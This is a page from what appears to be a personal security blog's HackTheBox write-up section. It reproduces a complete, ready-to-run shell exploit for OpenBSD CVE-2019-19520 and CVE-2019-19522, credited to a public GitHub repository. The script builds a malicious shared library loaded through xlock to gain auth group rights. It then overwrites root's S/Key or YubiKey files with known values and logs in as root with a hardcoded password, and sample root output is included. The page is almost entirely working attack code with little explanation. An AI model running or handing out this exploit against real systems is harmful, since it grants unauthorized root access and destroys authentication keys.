<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/"><b>>htb/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/buff/">buff/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/feline/">feline/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/omni/">omni/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/openkeys/"><b>>openkeys/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/openkeys/expl/"><b>>expl/</b></a></li>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/openkeys/img/">img/</a></li>
				</ul>
			</li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/sneaky_mailer/">sneaky mailer/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/time/">time/</a></li>
			</ul>
		</li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/">thm/</a></li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<p><a href="https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19520/openbsd-authroot">github.com/bcoles/local-exploits/blob/master/CVE-2019-19520/openbsd-authroot</a></p>
<p><a href="openbsd-authroot">openbsd-authroot</a>:</p>
<pre><code class="language-sh">#!/bin/sh
# openbsd-authroot - OpenBSD local root exploit for CVE-2019-19520 and CVE-2019-19522
# Code mostly stolen from Qualys PoCs:
# - https://www.openwall.com/lists/oss-security/2019/12/04/5
#
# Uses CVE-2019-19520 to gain 'auth' group permissions via xlock;
# and CVE-2019-19520 to gain root permissions via S/Key or YubiKey
# (requires S/Key or YubiKey authentication to be enabled).
# ---
# $ ./openbsd-authroot
# openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
# [*] checking system ...
# [*] system supports YubiKey authentication
# [*] id: uid=1002(test) gid=1002(test) groups=1002(test)
# [*] compiling ...
# [*] running Xvfb ...
# [*] testing for CVE-2019-19520 ...
# (EE) 
# Fatal server error:
# (EE) Server is already active for display 66
#         If this server is no longer running, remove /tmp/.X66-lock
#         and start again.
# (EE) 
# [+] success! we have auth group permissions
#
# WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).
#
# [*] trying CVE-2019-19522 (YubiKey) ...
# Your password is: krkhgtuhdnjclrikikklulkldlutreul
# Password:
# ksh: /etc/profile[2]: source: not found
# # id                                                                                                                                                                                    
# uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
# ---
# 2019-12-06 - &lt;bcoles@gmail.com&gt;
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-19520

echo &quot;openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)&quot;

echo &quot;[*] checking system ...&quot;

if grep auth= /etc/login.conf | fgrep -Ev &quot;^#&quot; | grep -q yubikey ; then
  echo &quot;[*] system supports YubiKey authentication&quot;
  target='yubikey'
elif grep auth= /etc/login.conf | fgrep -Ev &quot;^#&quot; | grep -q skey ; then
  echo &quot;[*] system supports S/Key authentication&quot;
  target='skey'
  if ! test -d /etc/skey/ ; then
    echo &quot;[-] S/Key authentication enabled, but has not been initialized&quot;
    exit 1
  fi
else
  echo &quot;[-] system does not support S/Key / YubiKey authentication&quot;
  exit 1
fi

echo &quot;[*] id: `id`&quot;

echo &quot;[*] compiling ...&quot;

cat &gt; swrast_dri.c &lt;&lt; &quot;EOF&quot;
#include &lt;paths.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;
static void __attribute__ ((constructor)) _init (void) {
    gid_t rgid, egid, sgid;
    if (getresgid(&amp;rgid, &amp;egid, &amp;sgid) != 0) _exit(__LINE__);
    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
    char * const argv[] = { _PATH_KSHELL, NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
EOF

cc -fpic -shared -s -o swrast_dri.so swrast_dri.c
rm -rf swrast_dri.c

echo &quot;[*] running Xvfb ...&quot;

display=&quot;:66&quot;

env -i /usr/X11R6/bin/Xvfb $display -cc 0 &amp;

echo &quot;[*] testing for CVE-2019-19520 ...&quot;

group=$(echo id -gn | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display)

if [ &quot;$group&quot; = &quot;auth&quot; ]; then
  echo &quot;[+] success! we have auth group permissions&quot;
else
  echo &quot;[-] failed to acquire auth group permissions&quot;
  exit 1
fi

# uncomment to drop to a shell with auth group permissions
#env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display ; exit

echo
echo &quot;WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).&quot;
echo
sleep 5

if [ &quot;$target&quot; = &quot;skey&quot; ]; then
  echo &quot;[*] trying CVE-2019-19522 (S/Key) ...&quot;
  echo &quot;rm -rf /etc/skey/root ; echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' &gt; /etc/skey/root ; chmod 0600 /etc/skey/root&quot; | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
  rm -rf swrast_dri.so
  echo &quot;Your password is: EGG LARD GROW HOG DRAG LAIN&quot;
  env -i TERM=vt220 su -l -a skey
fi

if [ &quot;$target&quot; = &quot;yubikey&quot; ]; then
  echo &quot;[*] trying CVE-2019-19522 (YubiKey) ...&quot;
  echo &quot;rm -rf /var/db/yubikey/root.* ; echo 32d32ddfb7d5 &gt; /var/db/yubikey/root.uid ; echo 554d5eedfd75fb96cc74d52609505216 &gt; /var/db/yubikey/root.key&quot; | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
  rm -rf swrast_dri.so
  echo &quot;Your password is: krkhgtuhdnjclrikikklulkldlutreul&quot;
  env -i TERM=vt220 su -l -a yubikey
fi
</code></pre>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
